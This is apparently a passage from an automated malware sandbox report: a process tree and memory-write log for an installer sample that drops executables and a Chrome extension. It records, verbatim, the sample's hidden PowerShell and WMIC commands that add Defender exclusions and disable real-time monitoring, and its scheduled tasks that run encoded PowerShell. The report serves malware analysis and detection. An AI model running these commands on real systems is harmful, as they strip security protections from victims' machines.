WMIC.exe Token: SeRestorePrivilege 1272 WMIC.exe Token: SeShutdownPrivilege 1272 WMIC.exe Token: SeSystemEnvironmentPrivilege 1272 WMIC.exe Token: SeUndockPrivilege 1272 WMIC.exe Token: SeManageVolumePrivilege 1272 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2240 wrote to memory of 2120 2240 c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe 28 PID 2240 wrote to memory of 2120 2240 c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe 28 PID 2240 wrote to memory of 2120 2240 c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe 28 PID 2240 wrote to memory of 2120 2240 c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe 28 PID 2240 wrote to memory of 2120 2240 c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe 28 PID 2240 wrote to memory of 2120 2240 c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe 28 PID 2240 wrote to memory of 2120 2240 c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe 28 PID 2120 wrote to memory of 2468 2120 Install.exe 29 PID 2120 wrote to memory of 2468 2120 Install.exe 29 PID 2120 wrote to memory of 2468 2120 Install.exe 29 PID 2120 wrote to memory of 2468 2120 Install.exe 29 PID 2120 wrote to memory of 2468 2120 Install.exe 29 PID 2120 wrote to memory of 2468 2120 Install.exe 29 PID 2120 wrote to memory of 2468 2120 Install.exe 29 PID 2468 wrote to memory of 2916 2468 Install.exe 31 PID 2468 wrote to memory of 2916 2468 Install.exe 31 PID 2468 wrote to memory of 2916 2468 Install.exe 31 PID 2468 wrote to memory of 2916 2468 Install.exe 31 PID 2468 wrote to memory of 2916 2468 Install.exe 31 PID 2468 wrote to memory of 2916 2468 Install.exe 31 PID 2468 wrote to memory of 2916 2468 Install.exe 31 PID 2916 wrote to memory of 2652 2916 forfiles.exe 33 PID 2916 wrote to memory of 2652 2916 forfiles.exe 33 PID 2916 wrote to memory of 2652 2916 forfiles.exe 33 PID 2916 wrote to memory of 2652 2916 forfiles.exe 33 PID 2916 wrote to memory of 2652 2916 forfiles.exe 33 PID 2916 wrote to memory of 2652 2916 forfiles.exe 33 PID 2916 wrote to memory of 2652 2916 forfiles.exe 33 PID 2652 wrote to memory of 2784 2652 cmd.exe 34 PID 2652 wrote to memory of 2784 2652 cmd.exe 34 PID 2652 wrote to memory of 2784 2652 cmd.exe 34 PID 2652 wrote to memory of 2784 2652 cmd.exe 34 PID 2652 wrote to memory of 2784 2652 cmd.exe 34 PID 2652 wrote to memory of 2784 2652 cmd.exe 34 PID 2652 wrote to memory of 2784 2652 cmd.exe 34 PID 2784 wrote to memory of 2892 2784 powershell.exe 35 PID 2784 wrote to memory of 2892 2784 powershell.exe 35 PID 2784 wrote to memory of 2892 2784 powershell.exe 35 PID 2784 wrote to memory of 2892 2784 powershell.exe 35 PID 2784 wrote to memory of 2892 2784 powershell.exe 35 PID 2784 wrote to memory of 2892 2784 powershell.exe 35 PID 2784 wrote to memory of 2892 2784 powershell.exe 35 PID 2468 wrote to memory of 2744 2468 Install.exe 36 PID 2468 wrote to memory of 2744 2468 Install.exe 36 PID 2468 wrote to memory of 2744 2468 Install.exe 36 PID 2468 wrote to memory of 2744 2468 Install.exe 36 PID 2468 wrote to memory of 2744 2468 Install.exe 36 PID 2468 wrote to memory of 2744 2468 Install.exe 36 PID 2468 wrote to memory of 2744 2468 Install.exe 36 PID 2808 wrote to memory of 2872 2808 taskeng.exe 39 PID 2808 wrote to memory of 2872 2808 taskeng.exe 39 PID 2808 wrote to memory of 2872 2808 taskeng.exe 39 PID 2808 wrote to memory of 2872 2808 taskeng.exe 39 PID 2872 wrote to memory of 3016 2872 hLgFofY.exe 40 PID 2872 wrote to memory of 3016 2872 hLgFofY.exe 40 PID 2872 wrote to memory of 3016 2872 hLgFofY.exe 40 PID 2872 wrote to memory of 3016 2872 hLgFofY.exe 40 PID 2872 wrote to memory of 1808 2872 hLgFofY.exe 42 PID 2872 wrote to memory of 1808 2872 hLgFofY.exe 42 PID 2872 wrote to memory of 1808 2872 hLgFofY.exe 42 PID 2872 wrote to memory of 1808 2872 hLgFofY.exe 42 PID 852 wrote to memory of 1612 852 taskeng.exe 45 PID 852 wrote to memory of 1612 852 taskeng.exe 45 PID 852 wrote to memory of 1612 852 taskeng.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe"C:\Users\Admin\AppData\Local\Temp\c90ceef25969ccabeb56d6053a8ae83cd0d15a6c7a29cd39236794857e589cb3.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Users\Admin\AppData\Local\Temp\7zS4C2D.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Users\Admin\AppData\Local\Temp\7zS5033.tmp\Install.exe.\Install.exe /yUcqTdidy "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bIOEZkRAagKtMyjtNl" /SC once /ST 05:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\SVMYiIrpsZEbcSR\hLgFofY.exe\" Ij /UNTzdidW 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 5044⤵
- Loads dropped DLL
- Program crash
PID:2112
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {0ABF7311-0D57-472C-951F-BD73F61C2459} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\SVMYiIrpsZEbcSR\hLgFofY.exeC:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\SVMYiIrpsZEbcSR\hLgFofY.exe Ij /UNTzdidW 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gePYPNBcN" /SC once /ST 02:25:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:3016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gePYPNBcN"3⤵PID:1808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gePYPNBcN"3⤵PID:1104
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2200
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:2020
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1380
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "geGXOhnWR" /SC once /ST 00:57:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "geGXOhnWR"3⤵PID:2180
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "geGXOhnWR"3⤵PID:2976
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2188
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:1704
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:323⤵PID:2136
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:643⤵PID:2360
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:323⤵PID:2484
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:324⤵PID:1936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:643⤵PID:2292
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:644⤵PID:2800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\bpNowFaEeWbSfYmu\jawVGWzn\iYOwosuZQvLQZkzs.wsf"3⤵PID:1336
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\bpNowFaEeWbSfYmu\jawVGWzn\iYOwosuZQvLQZkzs.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2692 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hVWjTjnIaijqmUVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hVWjTjnIaijqmUVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:324⤵PID:2040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:644⤵PID:1464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:324⤵PID:1272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:644⤵PID:3060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:324⤵PID:2756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:644⤵PID:2928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:324⤵PID:2620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:644⤵PID:1972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:324⤵PID:1812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:644⤵PID:2428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hVWjTjnIaijqmUVB" /t REG_DWORD /d 0 /reg:324⤵PID:1176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hVWjTjnIaijqmUVB" /t REG_DWORD /d 0 /reg:644⤵PID:2012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI" /t REG_DWORD /d 0 /reg:324⤵PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI" /t REG_DWORD /d 0 /reg:644⤵PID:1136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:324⤵PID:1408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\bpNowFaEeWbSfYmu" /t REG_DWORD /d 0 /reg:644⤵PID:812
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcXQbJogX" /SC once /ST 01:05:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcXQbJogX"3⤵PID:3056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcXQbJogX"3⤵PID:2484
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2604
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2792
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2764
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fxxmGIjnSbKlnnNZc" /SC once /ST 03:55:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\xTbLWfD.exe\" MC /eXNkdidKB 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "fxxmGIjnSbKlnnNZc"3⤵PID:2916
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2872 -s 3403⤵
- Loads dropped DLL
- Program crash
PID:2680
-
-
-
C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\xTbLWfD.exeC:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\xTbLWfD.exe MC /eXNkdidKB 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2556 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bIOEZkRAagKtMyjtNl"3⤵PID:3004
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:2628
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:1156
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:2980
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:1824
-
